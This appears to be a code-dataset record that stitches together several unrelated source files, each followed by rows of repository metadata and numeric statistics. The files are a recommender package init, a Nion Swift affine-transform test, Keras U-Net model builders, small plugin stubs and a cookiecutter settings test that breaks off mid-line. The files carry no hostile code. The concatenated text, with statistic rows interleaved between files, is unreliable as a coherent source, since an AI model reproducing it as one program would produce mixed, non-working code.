deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/deep_recommenders
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
40
2021-02-08T15:26:53.000Z
2022-03-29T08:41:14.000Z
#!/usr/bin/python3 # -*- coding: utf-8 -*- from deep_recommenders.keras.models.nlp.multi_head_attention import MultiHeadAttention from deep_recommenders.keras.models.nlp.transformer import Transformer
33.666667
86
0.816832
26
202
6.192308
0.692308
0.099379
0.248447
0.310559
0.42236
0.42236
0
0
0
0
0
0.010695
0.074257
202
5
87
40.4
0.850267
0.193069
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
fd4490769ac33da686f0ded5025b281fbe18996a
9,576
py
Python
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
8
2021-06-13T20:02:12.000Z
2022-03-24T09:19:23.000Z
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
null
null
null
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
1
2021-07-16T20:12:28.000Z
2021-07-16T20:12:28.000Z
import gettext import unittest import numpy # local libraries from nion.swift import Facade from nion.data import DataAndMetadata from nion.swift.test import TestContext from nion.ui import TestUI from nion.swift import Application from nion.swift.model import DocumentModel from nionswift_plugin.nion_experimental_tools import AffineTransformImage _ = gettext.gettext Facade.initialize() def create_memory_profile_context() -> TestContext.MemoryProfileContext: return TestContext.MemoryProfileContext() class TestAffineTransformImage(unittest.TestCase): def setUp(self): self.app = Application.Application(TestUI.UserInterface(), set_global=True) self.app.workspace_dir = str() def tearDown(self): pass def test_affine_transform_image_for_2d_data(self): with create_memory_profile_context() as profile_context: document_controller = profile_context.create_document_controller_with_application() document_model = document_controller.document_model data = numpy.zeros((5, 5)) data[2:-2, 1:-1] = 1 xdata = DataAndMetadata.new_data_and_metadata(data) api = Facade.get_api("~1.0", "~1.0") data_item = api.library.create_data_item_from_data_and_metadata(xdata) document_controller.selection.set(0) document_controller.selected_display_panel = None # use the document controller selection affine_transform = AffineTransformImage.AffineTransformMenuItem(api) affine_transform.menu_item_execute(api.application.document_controllers[0]) document_controller.periodic() # Can't convince the computation to update when changing the graphics, so just check that it got executed vector_a = data_item.graphics[0] vector_b = data_item.graphics[1] # # Rotate by 90 degrees vector_a.end = (0.75, 0.5) vector_b.end = (0.5, 0.75) # # Update computation document_controller.periodic() DocumentModel.evaluate_data(document_model.computations[0]) self.assertEqual(len(data_item.graphics), 2) self.assertEqual(api.library.data_item_count, 2) self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data))) def test_affine_transform_image_for_3d_data(self): data_descriptors = [DataAndMetadata.DataDescriptor(True, 0, 2), DataAndMetadata.DataDescriptor(False, 1, 2), DataAndMetadata.DataDescriptor(False, 2, 1)] for data_descriptor in data_descriptors: with self.subTest(data_descriptor=data_descriptor): with create_memory_profile_context() as profile_context: document_controller = profile_context.create_document_controller_with_application() document_model = document_controller.document_model data = numpy.zeros((5, 5, 5)) if data_descriptor.collection_dimension_count == 2: data[2:-2, 1:-1] = 1 else: data[..., 2:-2, 1:-1] = 1 xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor) api = Facade.get_api("~1.0", "~1.0") data_item = api.library.create_data_item_from_data_and_metadata(xdata) document_controller.selection.set(0) document_controller.selected_display_panel = None # use the document controller selection affine_transform = AffineTransformImage.AffineTransformMenuItem(api) affine_transform.menu_item_execute(api.application.document_controllers[0]) document_controller.periodic() # Can't convince the computation to update when changing the graphics, so just check that it got executed vector_a = data_item.graphics[0] vector_b = data_item.graphics[1] # # Rotate by 90 degrees vector_a.end = (0.75, 0.5) vector_b.end = (0.5, 0.75) # # Update computation document_controller.periodic() DocumentModel.evaluate_data(document_model.computations[0]) self.assertEqual(len(data_item.graphics), 2) self.assertEqual(api.library.data_item_count, 2) if data_descriptor.collection_dimension_count == 2: self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data))) else: self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2)))) def test_affine_transform_image_for_4d_data(self): data_descriptors = [DataAndMetadata.DataDescriptor(True, 1, 2), DataAndMetadata.DataDescriptor(False, 2, 2), DataAndMetadata.DataDescriptor(True, 2, 1)] for data_descriptor in data_descriptors: with self.subTest(data_descriptor=data_descriptor): with create_memory_profile_context() as profile_context: document_controller = profile_context.create_document_controller_with_application() document_model = document_controller.document_model data = numpy.zeros((5, 5, 5, 5)) if data_descriptor.collection_dimension_count == 2 and not data_descriptor.is_sequence: data[2:-2, 1:-1] = 1 elif data_descriptor.collection_dimension_count == 2 and data_descriptor.is_sequence: data[:, 2:-2, 1:-1] = 1 else: data[..., 2:-2, 1:-1] = 1 xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor) api = Facade.get_api("~1.0", "~1.0") data_item = api.library.create_data_item_from_data_and_metadata(xdata) document_controller.selection.set(0) document_controller.selected_display_panel = None # use the document controller selection affine_transform = AffineTransformImage.AffineTransformMenuItem(api) affine_transform.menu_item_execute(api.application.document_controllers[0]) document_controller.periodic() # Can't convince the computation to update when changing the graphics, so just check that it got executed vector_a = data_item.graphics[0] vector_b = data_item.graphics[1] # # Rotate by 90 degrees vector_a.end = (0.75, 0.5) vector_b.end = (0.5, 0.75) # # Update computation document_controller.periodic() DocumentModel.evaluate_data(document_model.computations[0]) self.assertEqual(len(data_item.graphics), 2) self.assertEqual(api.library.data_item_count, 2) if data_descriptor.collection_dimension_count == 2 and not data_descriptor.is_sequence: self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data))) elif data_descriptor.collection_dimension_count == 2 and data_descriptor.is_sequence: self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2)))) else: self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(2, 3)))) def test_affine_transform_image_for_5d_data(self): data_descriptor = DataAndMetadata.DataDescriptor(True, 2, 2) with create_memory_profile_context() as profile_context: document_controller = profile_context.create_document_controller_with_application() document_model = document_controller.document_model data = numpy.zeros((2, 5, 5, 5, 5)) data[:, 2:-2, 1:-1] = 1 xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor) api = Facade.get_api("~1.0", "~1.0") data_item = api.library.create_data_item_from_data_and_metadata(xdata) document_controller.selection.set(0) document_controller.selected_display_panel = None # use the document controller selection affine_transform = AffineTransformImage.AffineTransformMenuItem(api) affine_transform.menu_item_execute(api.application.document_controllers[0]) document_controller.periodic() # Can't convince the computation to update when changing the graphics, so just check that it got executed vector_a = data_item.graphics[0] vector_b = data_item.graphics[1] # # Rotate by 90 degrees vector_a.end = (0.75, 0.5) vector_b.end = (0.5, 0.75) # # Update computation document_controller.periodic() DocumentModel.evaluate_data(document_model.computations[0]) self.assertEqual(len(data_item.graphics), 2) self.assertEqual(api.library.data_item_count, 2) self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2))))
57.341317
125
0.636383
1,077
9,576
5.4039
0.12442
0.098969
0.03299
0.008419
0.874055
0.874055
0.840893
0.821649
0.821649
0.821649
0
0.028185
0.281224
9,576
166
126
57.686747
0.817376
0.078425
0
0.744526
0
0
0.003637
0
0
0
0
0
0.109489
1
0.051095
false
0.007299
0.072993
0.007299
0.138686
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
b5dbc5e6b7db19ae658944e14379748b6bded351
116
py
Python
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
null
null
null
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T02:36:22.000Z
2020-08-25T02:36:22.000Z
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T01:56:04.000Z
2020-08-25T01:56:04.000Z
from efr32bg22.halconfig import halconfig_types as types from efr32bg22.halconfig import halconfig_dependency as dep
58
59
0.887931
16
116
6.3125
0.5
0.257426
0.435644
0.554455
0.732673
0
0
0
0
0
0
0.07619
0.094828
116
2
59
58
0.885714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
b5e008c51a1e776e0e6b0c5979b8098cd2209636
14,108
py
Python
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
null
null
null
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
1
2022-03-13T09:42:18.000Z
2022-03-13T09:42:18.000Z
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
1
2021-11-23T19:17:45.000Z
2021-11-23T19:17:45.000Z
# -*- coding: utf-8 -*- """ Created on Thu Feb 18 07:45:38 2021 @author: Mihai Boldeanu """ from tensorflow.keras import regularizers from tensorflow.keras.models import Model from tensorflow.keras.layers import Activation, Conv2DTranspose from tensorflow.keras.layers import Input, BatchNormalization from tensorflow.keras.layers import Conv2D, MaxPooling2D, UpSampling2D from tensorflow.keras.layers import add,concatenate def get_model(img_size, num_classes,first_layer = 16): inputs = Input(shape=img_size ) ### [First half of the network: downsampling inputs] ### l1_weight = 1e-6 * 16./first_layer l2_weight = 1e-5 * (16./first_layer)**2 # Entry block x = Conv2D(first_layer, 3, strides=2, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs) x = BatchNormalization()(x) x = Activation("relu")(x) previous_block_activation = x # Set aside residual # Blocks 1, 2, 3 are identical apart from the feature depth. for filters in [ 2*first_layer, 4*first_layer,8*first_layer,16*first_layer]: x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = MaxPooling2D(3, strides=2, padding="same")(x) # Project residual residual = Conv2D(filters, 1, strides=2, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))( previous_block_activation) x = add([x, residual]) # Add back residual previous_block_activation = x # Set aside next residual ### [Second half of the network: upsampling inputs] ### for filters in [ 16*first_layer, 8*first_layer,4*first_layer,2*first_layer,first_layer]: x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = UpSampling2D(2)(x) # Project residual residual = UpSampling2D(2)(previous_block_activation) residual = Conv2D(filters, 1, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual) x = add([x, residual]) # Add back residual previous_block_activation = x # Set aside next residual # Add a per-pixel classification layer outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) # Define the model model = Model(inputs, outputs) return model def get_model_v2(img_size, num_classes,first_layer = 16): inputs = Input(shape=img_size ) ### [First half of the network: downsampling inputs] ### l1_weight = 1e-6 * 16./first_layer l2_weight = 1e-5 * (16./first_layer)**2 previous_block_activations = [] # Entry block x = Conv2D(first_layer, 3, strides=2, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs) x = BatchNormalization()(x) x = Activation("relu")(x) previous_block_activation = x # Set aside residual previous_block_activations.append(x) # Set aside deep residual # Blocks 1, 2, 3 are identical apart from the feature depth. for filters in [ 2*first_layer, 4*first_layer,8*first_layer,16*first_layer]: x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = MaxPooling2D(3, strides=2, padding="same")(x) # Project residual residual = Conv2D(filters, 1, strides=2, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))( previous_block_activation) previous_block_activations.append(x) x = add([x, residual]) # Add back residual previous_block_activation = x # Set aside next residual ### [Second half of the network: upsampling inputs] ### previous_block_activations.reverse() for i,filters in enumerate([ 16*first_layer, 8*first_layer,4*first_layer,2*first_layer,first_layer]): x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = UpSampling2D(2)(x) # Project residual residual = UpSampling2D(2)(previous_block_activation) residual = Conv2D(filters, 1, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual) x = add([x, residual]) # Add back residual deep_residual = UpSampling2D(2)(previous_block_activations[i]) deep_residual = Conv2D(filters, 1, padding="same", kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(deep_residual) x = concatenate([x, deep_residual]) # Add back residual previous_block_activation = x # Set aside next residual # Add a per-pixel classification layer outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) # Define the model model = Model(inputs, outputs) return model def get_model_unet(img_size, num_classes,first_layer = 16): l1_weight = 1e-6 * 16./first_layer l2_weight = 1e-5 * (16./first_layer)**2 inputs = Input(shape=img_size ) ### [First half of the network: downsampling inputs] ### previous_block_activations = [] # Entry block x = Conv2D(first_layer, 3, strides=2, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs) x = BatchNormalization()(x) x = Activation("relu")(x) previous_block_activations.append(x) # Set aside residual # Blocks 1, 2, 3 are identical apart from the feature depth. for filters in [ 2*first_layer, 4*first_layer,8*first_layer,16*first_layer]: x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = MaxPooling2D(3, strides=2, padding="same")(x) # # Project residual # residual = Conv2D(filters, 1, strides=2, padding="same",kernel_initializer='glorot_normal')( # previous_block_activation) # x = concatenate([x, residual]) # Add back residual previous_block_activations.append(x) # Set aside next residual ### [Second half of the network: upsampling inputs] ### previous_block_activations.reverse() for i,filters in enumerate([ 16*first_layer, 8*first_layer,4*first_layer,2*first_layer,first_layer]): x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False, kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) x = BatchNormalization()(x) x = UpSampling2D(2)(x) # Project residual residual = UpSampling2D(2)(previous_block_activations[i]) residual = Conv2D(filters, 1, padding="same",kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual) x = concatenate([x, residual]) # Add back residual # previous_block_activation = x # Set aside next residual # Add a per-pixel classification layer outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal', kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x) # Define the model model = Model(inputs, outputs) return model def get_model_unet_plus(img_size, num_classes,first_layer = 16): inputs = Input(shape=img_size ) ### [First half of the network: downsampling inputs] ### previous_block_activations = [] # Entry block x = Conv2D(first_layer, 3, strides=2, padding="same",use_bias=False,kernel_initializer='glorot_normal')(inputs) x = BatchNormalization()(x) x = Activation("relu")(x) # previous_block_activations.append(x) # Set aside residual previous_block_activation = x # Blocks 1, 2, 3 are identical apart from the feature depth. for filters in [ 2*first_layer, 4*first_layer,8*first_layer,16*first_layer]: x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False,kernel_initializer='glorot_normal')(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2D(filters, 3, padding="same",use_bias=False,kernel_initializer='glorot_normal')(x) x = BatchNormalization()(x) x = MaxPooling2D(3, strides=2, padding="same")(x) # # Project residual residual = Conv2D(filters, 1, strides=2, padding="same",kernel_initializer='glorot_normal')( previous_block_activation) x = add([x, residual]) # Add back residual # previous_block_activations.append(x) # Set aside next residual previous_block_activation = x ### [Second half of the network: upsampling inputs] ### previous_block_activations.reverse() for i,filters in enumerate([ 16*first_layer, 8*first_layer,4*first_layer,2*first_layer,first_layer]): x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False,kernel_initializer='glorot_normal')(x) x = BatchNormalization()(x) x = Activation("relu")(x) x = Conv2DTranspose(filters, 3, padding="same",use_bias=False,kernel_initializer='glorot_normal')(x) x = BatchNormalization()(x) x = UpSampling2D(2)(x) # Project residual # residual = UpSampling2D(2)(previous_block_activations[i]) # residual = Conv2D(filters, 1, padding="same",kernel_initializer='glorot_normal')(residual) # x = concatenate([x, residual]) # Add back residual # # previous_block_activation = x # Set aside next residual residual = UpSampling2D(2)(previous_block_activation) residual = Conv2D(filters, 1, padding="same",kernel_initializer='glorot_normal')(residual) x = add([x, residual]) # Add back residual previous_block_activation = x # Set aside next residual # Add a per-pixel classification layer output_1 = Conv2D(num_classes, 3, activation="softmax", padding="same",name="class_segmentation")(x) output = Conv2D(20, 3, activation="relu", padding="same")(output_1) output = Conv2D(20, 3, activation="relu", padding="same")(output) output_2 = Conv2D(1, 3, activation="sigmoid", padding="same",name="instance_segmentation")(output) # Define the model model = Model(inputs, [output_1,output_2]) return model
45.656958
115
0.643536
1,715
14,108
5.093878
0.067055
0.012134
0.086882
0.109547
0.952038
0.930288
0.925366
0.916781
0.907166
0.895375
0
0.035427
0.241707
14,108
309
116
45.656958
0.781174
0.148426
0
0.870647
0
0
0.060598
0.001765
0
0
0
0
0
1
0.019901
false
0
0.029851
0
0.069652
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bd37cc002a138ff9901ff30c859c06288229dff9
98
py
Python
LRE/plugins/test/plugin.py
MashowJ/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
1
2018-01-13T14:58:07.000Z
2018-01-13T14:58:07.000Z
LRE/plugins/test/plugin.py
AlinadoOrg/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
null
null
null
LRE/plugins/test/plugin.py
AlinadoOrg/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- def init(): pass def servers(): return {}
10.888889
23
0.530612
13
98
4
0.923077
0
0
0
0
0
0
0
0
0
0
0.013514
0.244898
98
8
24
12.25
0.689189
0.428571
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.25
0
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
1
1
0
0
7
1fbb3a9e2d93a1a84cb0d7cc949780bcdd3fceb5
140
py
Python
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
null
null
null
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
null
null
null
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
2
2019-11-09T17:52:46.000Z
2019-11-10T15:31:00.000Z
from time import time from math import sin def get_values(): #normally get sensor data here return dict(co=100*sin(time()*0.2)+100)
23.333333
43
0.714286
25
140
3.96
0.72
0
0
0
0
0
0
0
0
0
0
0.069565
0.178571
140
6
43
23.333333
0.791304
0.207143
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0
0.5
0.25
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
7
1fc6c49c7b60cc931757a385d4a2e4eaa1b1c494
13,830
py
Python
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
import os import pytest import simplejson as json from pkg_resources import Requirement, resource_filename from {{cookiecutter.project_slug}}.settings import ENVIRONMENTS, ImproperlyConfiguredError class DescribeDevelopmentConfigLoader: def it_resolves_to_correct_default_config_paths(self): cfg = ENVIRONMENTS["development"]() # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [ os.path.join(cfg._REPO_ROOT, "config", "development.yaml") ] assert cfg.filelog_abspath == os.path.join( cfg._REPO_ROOT, "log", "development.log" ) assert cfg.logging_config_abspaths == [ os.path.join(cfg._REPO_ROOT, "config", "logging_config.json") ] cfg._IS_RUNNING_FROM_SOURCE = False assert cfg.config_file_abspaths == [ resource_filename( Requirement.parse("{{cookiecutter.project_slug}}"), "{{cookiecutter.project_slug}}/resources/development.yaml", ) ] assert cfg.filelog_abspath == os.path.join( cfg.DEFAULT_TEMP_DIR, "development.log" ) assert cfg.logging_config_abspaths == [ resource_filename( Requirement.parse("{{cookiecutter.project_slug}}"), "{{cookiecutter.project_slug}}/resources/logging_config.json", ) ] def it_accepts_absolute_paths_for_cmdline_arguments(self, mocker): absolute_paths = mocker.Mock() absolute_paths.config_file_path = "/absolute/path/config_file.yaml" absolute_paths.log_file_path = "/absolute/path/log_file.log" absolute_paths.logging_config_path = "/absolute/path/logging_config.json" cfg = ENVIRONMENTS["development"](absolute_paths) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [absolute_paths.config_file_path] assert cfg.filelog_abspath == absolute_paths.log_file_path assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path] cfg._IS_RUNNING_FROM_SOURCE = False assert cfg.config_file_abspaths == [absolute_paths.config_file_path] assert cfg.filelog_abspath == absolute_paths.log_file_path assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path] cfg = ENVIRONMENTS["development"]() cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}} assert cfg.filelog_abspath == "/foo/bar.json" def it_raises_if_it_gets_relative_paths_for_cmdline_arguments(self, mocker): relative_paths = mocker.Mock() relative_paths.config_file_path = "relative/path/config_file.yaml" relative_paths.log_file_path = "relative/path/log_file.log" relative_paths.logging_config_path = "relative/path/logging_config.json" cfg = ENVIRONMENTS["development"](relative_paths) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True with pytest.raises(ImproperlyConfiguredError): cfg.config_file_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.logging_config_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.filelog_abspath cfg._IS_RUNNING_FROM_SOURCE = False with pytest.raises(ImproperlyConfiguredError): cfg.config_file_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.logging_config_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.filelog_abspath class DescribeTestConfigLoader: def it_resolves_to_correct_default_config_paths(self): cfg = ENVIRONMENTS["test"]() # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [ os.path.join(cfg._REPO_ROOT, "config", "test.yaml") ] assert cfg.filelog_abspath == os.path.join(cfg._REPO_ROOT, "log", "test.log") assert cfg.logging_config_abspaths == [ os.path.join(cfg._REPO_ROOT, "config", "logging_config.json") ] cfg._IS_RUNNING_FROM_SOURCE = False assert cfg.config_file_abspaths == [ resource_filename( Requirement.parse("{{cookiecutter.project_slug}}"), "{{cookiecutter.project_slug}}/resources/test.yaml" ) ] assert cfg.filelog_abspath == os.path.join(cfg.DEFAULT_TEMP_DIR, "test.log") assert cfg.logging_config_abspaths == [ resource_filename( Requirement.parse("{{cookiecutter.project_slug}}"), "{{cookiecutter.project_slug}}/resources/logging_config.json", ) ] def it_accepts_absolute_paths_for_cmdline_arguments(self, mocker): absolute_paths = mocker.Mock() absolute_paths.config_file_path = "/absolute/path/config_file.yaml" absolute_paths.log_file_path = "/absolute/path/log_file.log" absolute_paths.logging_config_path = "/absolute/path/logging_config.json" cfg = ENVIRONMENTS["test"](absolute_paths) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [absolute_paths.config_file_path] assert cfg.filelog_abspath == absolute_paths.log_file_path assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path] cfg._IS_RUNNING_FROM_SOURCE = False assert cfg.config_file_abspaths == [absolute_paths.config_file_path] assert cfg.filelog_abspath == absolute_paths.log_file_path assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path] cfg = ENVIRONMENTS["test"]() cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}} assert cfg.filelog_abspath == "/foo/bar.json" def it_raises_if_it_gets_relative_paths_for_cmdline_arguments(self, mocker): relative_paths = mocker.Mock() relative_paths.config_file_path = "relative/path/config_file.yaml" relative_paths.log_file_path = "relative/path/log_file.log" relative_paths.logging_config_path = "relative/path/logging_config.json" cfg = ENVIRONMENTS["test"](relative_paths) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True with pytest.raises(ImproperlyConfiguredError): cfg.config_file_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.logging_config_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.filelog_abspath cfg._IS_RUNNING_FROM_SOURCE = False with pytest.raises(ImproperlyConfiguredError): cfg.config_file_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.logging_config_abspaths with pytest.raises(ImproperlyConfiguredError): cfg.filelog_abspath class DescribeProductionConfigLoader: def it_resolves_to_correct_default_config_paths(self, mocker): cfg = ENVIRONMENTS["production"]() # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [ "/etc/{{cookiecutter.project_slug}}/production.yaml", 